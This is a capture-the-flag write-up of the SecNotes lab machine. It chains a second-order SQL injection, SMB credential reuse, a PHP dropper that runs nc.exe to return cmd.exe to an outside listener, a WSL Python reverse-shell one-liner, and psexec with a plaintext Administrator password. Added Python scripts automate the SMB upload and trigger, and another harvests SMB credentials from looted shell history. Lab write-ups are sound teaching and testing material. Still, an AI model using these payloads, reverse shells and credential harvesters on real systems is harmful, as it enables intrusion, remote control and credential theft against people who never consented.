SecNotes

Summary

  • Open ports: 80 (web), 135/139/445 (MSRPC/NetBIOS/SMB), and 8808 (IIS default page).

  • The main site (/login.php) hosted a note-taking app vulnerable to SQL injection and CSRF.

  • Exploited a second-order SQLi via the registration form: registering the username ' OR 1 OR ' makes the notes query return every user's notes, not just our own.

  • Those notes contained SMB credentials for the user tyler.

  • With SMB access, uploaded nc.exe plus a PHP wrapper to the writable new-site share, which backs the IIS site on port 8808.

  • Got the initial shell by requesting the uploaded PHP file in the browser.

  • Privilege escalation was achieved via WSL: bash.exe was present on the box, and commands run through WSL execute as root inside the Linux environment, giving a root shell via a reverse connection from WSL.

  • root's .bash_history in WSL revealed the Administrator credentials.

  • Used impacket-psexec with the Administrator creds to get a SYSTEM shell.


Enumeration

nmap -p- -T5 10.10.10.97 -vv
sudo nmap -sC -sV -A -oN full.nmap -p80,135,139,445,8808 10.10.10.97

Discovered:

  • Port 80: Secure Notes login panel (login.php)

  • Ports 135/139: MSRPC and NetBIOS session service

  • Port 8808: Default IIS page

  • Port 445: SMB with a new-site share (writable for tyler; it is the web root of the IIS site on 8808)


Initial Foothold

Web App (Port 80)

Second-order SQL injection on the Sign-Up page (the quote is stored at registration and only breaks the later notes query):

# Registration payload
Username: ' OR 1 OR '
Password: anything

Logging in with that account shows every user's notes; one of them contained the following SMB credentials:

Username: tyler
Password: <FINDIT!>
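A simulation of the second-order injection, added here as an example (not code from the original box or writeup). The schema, the stored notes and the password 'secret' are constructed; the vulnerable function concatenates the stored username into the notes query exactly the way the app must, and the fixed one uses a bound parameter.

```python
import sqlite3

# Added simulation of the second-order SQL injection; schema and notes are constructed,
# not the real SecNotes database.


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE notes(username TEXT, body TEXT);
        INSERT INTO users VALUES('tyler', 'secret');
        INSERT INTO notes VALUES('tyler', 'new-site creds: tyler / <FINDIT!>');
        INSERT INTO notes VALUES('tyler', 'todo: migrate site to 8808');
    """)
    return conn


def register(conn, username, password):
    # Registration itself is parameterised: the quotes in the username are stored verbatim...
    conn.execute("INSERT INTO users VALUES(?, ?)", (username, password))


def list_notes_vulnerable(conn, username):
    # ...and later concatenated into the notes query (the second-order flaw).
    # With username = ' OR 1 OR ' this becomes:
    #   SELECT body FROM notes WHERE username = '' OR 1 OR ''
    # and the constant 1 makes the WHERE clause true for every row.
    sql = "SELECT body FROM notes WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def list_notes_fixed(conn, username):
    # Bound parameter: the stored username is compared as data, never parsed as SQL.
    return [row[0] for row in conn.execute(
        "SELECT body FROM notes WHERE username = ?", (username,))]


def demo(username="' OR 1 OR '"):
    """Register the attacker account and return (vulnerable listing, fixed listing)."""
    conn = setup_db()
    register(conn, username, "anything")
    return list_notes_vulnerable(conn, username), list_notes_fixed(conn, username)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable query returned:", leaked)
    print("parameterised query returned:", safe)
```

The vulnerable listing returns tyler's notes to an account that owns none; the parameterised version returns nothing, which is the correct result for a freshly registered user.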

SMB Enumeration

crackmapexec smb 10.10.10.97 -u 'tyler' -p '<FINDIT!>' --shares

# Result:
new-site - READ,WRITE

Uploaded two files to the new-site share via SMB:

  • nc.exe

  • a PHP wrapper that runs nc.exe -e cmd.exe back to our listener:

<?php system("nc.exe -e cmd.exe 10.10.16.2 8888"); ?>

Then requested the PHP file through the IIS site on port 8808 from the browser.

Listener:

nc -lvnp 8888

Shell obtained!
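The upload-and-trigger steps above as one script, added here as an example (not the original writeup's tooling). It builds the PHP wrapper, pushes both files with a non-interactive smbclient session, confirms they show up in the share listing and prints the URL to request; the target, share, credentials, file name shell.php and listener address are assumptions for illustration.

```python
import subprocess

# Added example: ship nc.exe plus a PHP dropper over SMB and point at the trigger URL.
# Target, share, credentials and file names below are assumptions for illustration.


def php_dropper(lhost, lport, nc="nc.exe"):
    """PHP wrapper that runs nc.exe (uploaded beside it in the web root) and
    connects cmd.exe back to the listener at lhost:lport."""
    return '<?php system("%s -e cmd.exe %s %d"); ?>\n' % (nc, lhost, lport)


def smbclient_argv(target, share, user, password, commands):
    """argv for a non-interactive smbclient session. Passing a list (no shell)
    means characters like ! and # in the password need no escaping."""
    return ["smbclient", "//%s/%s" % (target, share),
            "-U", "%s%%%s" % (user, password),
            "-c", "; ".join(commands)]


def trigger_url(target, port, remote_name):
    """URL that executes the dropper: the share is the web root of the IIS site."""
    return "http://%s:%d/%s" % (target, port, remote_name)


def deploy(target, share, user, password, lhost, lport, php_name="shell.php"):
    with open(php_name, "w") as fh:
        fh.write(php_dropper(lhost, lport))
    argv = smbclient_argv(target, share, user, password,
                          ["put nc.exe nc.exe", "put %s %s" % (php_name, php_name), "ls"])
    listing = subprocess.run(argv, check=True, capture_output=True, text=True).stdout
    # Verify the write actually landed before wasting a listener on it.
    if php_name not in listing or "nc.exe" not in listing:
        raise RuntimeError("upload not visible in share listing:\n" + listing)
    url = trigger_url(target, 8808, php_name)
    print("start `nc -lvnp %d`, then request %s" % (lport, url))
    return url


if __name__ == "__main__":
    # Assumed values; <FINDIT!> is the password recovered from the notes.
    deploy("10.10.10.97", "new-site", "tyler", "<FINDIT!>", "10.10.16.2", 8888)
```

A local copy of nc.exe must sit in the working directory; the `ls` at the end of the smbclient session is the cheap check that both files were written before the browser request is made.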


Privilege Escalation

WSL Abuse

Located WSL:

where /R C:\windows bash.exe
# Found at:
C:\Windows\WinSxS\...\bash.exe

Checked which Linux user WSL commands run as:

wsl whoami
# Output:
root

Spawned root shell via reverse connection from WSL:

# Listener
nc -lvnp 9999

# Command on target:
wsl python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.16.2",9999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

If the shell lands without a proper TTY, upgrade it:

python -c 'import pty; pty.spawn("/bin/bash")'

Looted /root/.bash_history inside WSL, which revealed the Administrator SMB credentials:

Username: administrator
Password: u6!4ZwgwOM#^OBf#Nwnh
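A small extractor for the kind of loot found in the history file, added here as an example (not part of the original writeup). It pulls user%password pairs out of smbclient -U invocations, quoted or bare; the sample history lines are constructed, and the demo%demo-pass entry is invented to show the unquoted form.

```python
import re

# Added example: pull SMB credentials out of a looted shell history.
# Matches the smbclient -U user%pass forms (single-quoted, double-quoted or bare).
CRED_RE = re.compile(
    r"-U\s+(?:'([^'%]+)%([^']+)'"        # -U 'user%pass'
    r"|\"([^\"%]+)%([^\"]+)\""           # -U "user%pass"
    r"|([^\s'\"%]+)%(\S+))"              # -U user%pass
)


def extract_smb_creds(history_lines):
    """Return unique (user, password) pairs in the order they appear."""
    found = []
    for line in history_lines:
        for m in CRED_RE.finditer(line):
            # Exactly one alternative matched, so exactly two groups are set.
            groups = [g for g in m.groups() if g is not None]
            pair = (groups[0], groups[1])
            if pair not in found:
                found.append(pair)
    return found


# Constructed sample history (not the real /root/.bash_history); the demo account is invented.
SAMPLE_HISTORY = [
    "cd /mnt/c/Users/tyler/Desktop",
    r"smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$",
    "smbclient -U demo%demo-pass //10.10.10.97/new-site",
    "ls -la",
]


if __name__ == "__main__":
    for user, password in extract_smb_creds(SAMPLE_HISTORY):
        print("%s : %s" % (user, password))
```

Run it over `cat /root/.bash_history` output (or any other shell history you can read) to avoid eyeballing long files for the one line that matters.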

SYSTEM Shell via psexec

impacket-psexec SECNOTES/administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97

Boom! Got SYSTEM access and root flag.
